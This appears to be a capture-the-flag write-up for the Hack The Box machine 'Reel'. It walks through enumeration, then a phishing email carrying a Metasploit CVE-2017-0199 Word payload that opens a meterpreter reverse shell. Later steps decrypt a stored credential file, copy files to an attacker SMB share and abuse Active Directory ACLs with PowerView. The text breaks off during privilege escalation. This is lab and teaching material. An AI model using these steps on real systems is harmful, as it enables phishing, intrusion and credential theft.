Reel is medium to hard difficulty machine, which requires a client-side attack to bypass the perimeter and highlights a technique for gaining privileges in an Active Directory environment.
Enumeration
Scope
IP Address: 10.10.10.77
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack
22/tcp open ssh syn-ack
25/tcp open smtp syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p -sCV $ip -Pn -oN Nmap/script-scan
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-29-18 12:19AM <DIR> documents
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
| 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_ 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp open smtp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
| 220 Mail Service ready
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| Hello:
| 220 Mail Service ready
| EHLO Invalid domain address.
| Help:
| 220 Mail Service ready
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| SIPOptions:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| TerminalServerCookie:
| 220 Mail Service ready
|_ sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2012 R2 Standard 9600 microsoft-ds
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 3:0:2:
|_ Message signing enabled and required
| smb-os-discovery:
| OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
| OS CPE: cpe:/o:microsoft:windows_server_2012::-
| Computer name: REEL
| NetBIOS computer name: REEL\x00
| Domain name: HTB.LOCAL
| Forest name: HTB.LOCAL
| FQDN: REEL.HTB.LOCAL
|_ System time: 2024-07-12T12:48:32+01:00
| smb2-time:
| date: 2024-07-12T11:48:30
|_ start_date: 2024-07-12T11:40:43
|_clock-skew: mean: -19m53s, deviation: 34m36s, median: 4s
* Open ports: 21,22,25,135,139,445
* Services: FTP - SSH - SMTP - RPC - SMB
* Versions: Windows Server 2012 R2 Standard 9600 - OpenSSH 7.6
* Important Notes: FQDN: REEL.HTB.LOCAL - Domain name: HTB.LOCAL - Anonymous FTP login allowed
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ ls
10.10.10.77 Nmap
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ tree 10.10.10.77
10.10.10.77
└── documents
├── AppLocker.docx
├── Windows Event Forwarding.docx
└── readme.txt
I downloaded these files but I found nothing interesting inside them. except the email address of the creator of these files nico@megabank.com
RPC Enumeration
No data from rpcclient
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ rpcclient -U "%" $ip
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
SMB Enumeration
I can't list the shares with cme or smbclient
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ smbclient -N -L //$ip
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.77 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ crackmapexec smb $ip -u '' -p '' --shares
SMB 10.10.10.77 445 REEL [*] Windows Server 2012 R2 Standard 9600 x64 (name:REEL) (domain:HTB.LOCAL) (signing:True) (SMBv1:True)
SMB 10.10.10.77 445 REEL [+] HTB.LOCAL\:
SMB 10.10.10.77 445 REEL [-] Error enumerating shares: STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ crackmapexec smb $ip -u 'guest' -p '' --shares
SMB 10.10.10.77 445 REEL [*] Windows Server 2012 R2 Standard 9600 x64 (name:REEL) (domain:HTB.LOCAL) (signing:True) (SMBv1:True)
SMB 10.10.10.77 445 REEL [-] HTB.LOCAL\guest: STATUS_ACCOUNT_DISABLED
SMTP Enumeration
I always scan for open-relay if I found SMTP server to check for the possibility of sending arbitrary emails that can be used for phishing.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ nmap -p25 --script smtp-open-relay $ip -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-12 08:05 EDT
Nmap scan report for 10.10.10.77
Host is up (0.068s latency).
PORT STATE SERVICE
25/tcp open smtp
|_smtp-open-relay: Server is an open relay (8/16 tests)
Initial Access
Shell as nico
I got a hint from community that there is a CVE affects Microsoft office that allow RCE via phishing emails. CVE-2017–0199
since we can send arbitrary emails as smtp server is Open relay, we can craft a payload and send it via smtp server to get remote code execution
There is a Metasploit module that can generate the malicious payload we want to send
msf6 > search CVE-2017-0199
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/fileformat/office_word_hta 2017-04-14 excellent No Microsoft Office Word Malicious Hta Execution
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/office_word_hta) > options
Module options (exploit/windows/fileformat/office_word_hta):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.doc yes The file name.
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local mac
hine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH default.hta yes The URI to use for the HTA file
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Microsoft Office Word
msf6 exploit(windows/fileformat/office_word_hta) > set srvhost tun0
msf6 exploit(windows/fileformat/office_word_hta) > set srvport 80
msf6 exploit(windows/fileformat/office_word_hta) > set lhost tun0
msf6 exploit(windows/fileformat/office_word_hta) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.16.7:4444
msf6 exploit(windows/fileformat/office_word_hta) > [+] msf.doc stored at /home/kali/.msf4/local/msf.doc
[*] Using URL: http://10.10.16.7/default.hta
[*] Server started.
Send email to the user we found with sendEmail command with the attachment generated from Metasploit
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ sendemail -t nico@megabank.com -f blind@htb.com -u 'Are you Reel!!!' -m "Click me" -a /home/kali/.msf4/local/msf.doc -s $ip
Jul 12 11:27:25 kali sendemail[77146]: Email was sent successfully!
At Metasploit, I got a connection back as nico user
[*] Sending stage (176198 bytes) to 10.10.10.77
[*] Meterpreter session 1 opened (10.10.16.7:4444 -> 10.10.10.77:58083) at 2024-07-12 11:27:45 -0400
msf6 exploit(windows/fileformat/office_word_hta) > sessions 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: HTB\nico
Get the flag from user's desktop
meterpreter > shell
Process 3524 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd C:\Users\nico
C:\Users\nico>type Desktop\user.txt
4b1fa88985d787becfxxxxxxxxxxxxxx
User Flag: 4b1fa88985d787becfxxxxxxxxxxxxxx
Privilege Escalation
Shell as Tom
C:\Users\nico>tree /F
Folder PATH listing
Volume serial number is FFFFFFB9 CEBA:B613
C:.
Contacts
Desktop
cred.xml
user.txt
<snip>
It's a PowerShell credential file
We can decrypt these credentials with Cli-xml native tool
C:\Users\nico>PowerShell -c "$credentials= Import-Clixml -Path C:\Users\nico\Desktop\cred.xml; $credentials.GetNetworkCredential().username; $credentials.GetNetworkCredential().password"
Tom
1ts-mag1c!!!
We don't have any remote access solution to the machine except ssh, Let's try to authenticate with tom with ssh
tom@REEL C:\Users\tom>type "Desktop\AD Audit\note.txt"
Findings:
Surprisingly no AD attack paths from user to Domain Admin (using default shortest path query).
Maybe we should re-run Cypher query against other groups we've created.
The other files are PowerView.ps1 which can be used to enumerate AD Environment and exploit misconfiguration, Sharphound.exe is the Ingestor of bloodhound that collect information about the domain.
The most interesting file is acls.csv, I will copy it to my kali machine after starting local smb server
tom@REEL C:\Users\tom>net use n: \\10.10.16.7\share /user:blind0bandit blind0bandit
The command completed successfully.
tom@REEL C:\Users\tom>copy "Desktop\AD Audit\BloodHound\Ingestors\acls.csv" n:
1 file(s) copied.
I opened the file and start to explore it manually as I tried to upload it to bloodhound, but it failed for me.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ open acls.csv
Searching for the user tom, I found the following:
user tom has WriteOwner on user claire
user claire has WriteDacl on group backup_admins
It's a potential path we can take to takeover claire account then authenticate with this account and modify the ACLs of backup_admins group to be able to add ourselves in that group which seems to be high privileges group
Using PowerView.ps1 already exists on the machine can be useful to execute this attack path
Shell as Claire
Abuse WriteOwner to get ownership of claire user to be able to modify its access control and get the privileges to change its password
set-domainobjectowner -Identity claire -OwnerIdentity tom
add-domainobjectacl -TargetIdentity claire -PrincipalIdentity tom -Rights Resetpassword
